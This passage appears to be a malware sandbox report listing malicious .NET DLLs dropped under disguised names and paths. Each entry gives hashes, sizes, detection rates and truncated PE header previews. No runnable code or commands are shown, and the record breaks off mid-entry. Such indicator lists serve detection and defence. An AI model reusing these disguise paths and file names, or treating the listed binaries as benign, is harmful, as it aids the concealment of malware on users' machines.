Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LxMgmcSS.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MPdHuBxA.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NZUxJEKO.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NoWOUMSl.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NpzpwslB.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PIQPERQj.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RPLnQAKH.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TZhoQTpI.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.529329139831718
Encrypted:	false
SSDEEP:	384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
MD5:	8AE2B8FA17C9C4D99F76693A627307D9
SHA1:	7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
SHA-256:	0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
SHA-512:	DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UWIwmTED.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\UfDWuYEk.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WKMEYgAB.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XOSeUCEW.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZSKNtyuw.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZTxvzCno.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\bGOWfMqu.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dQveIBvX.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\eDXMSiYF.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eLGexRyL.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\frbUEvTD.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gQJUAkON.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\jCRLjesV.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kEjDZxDz.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
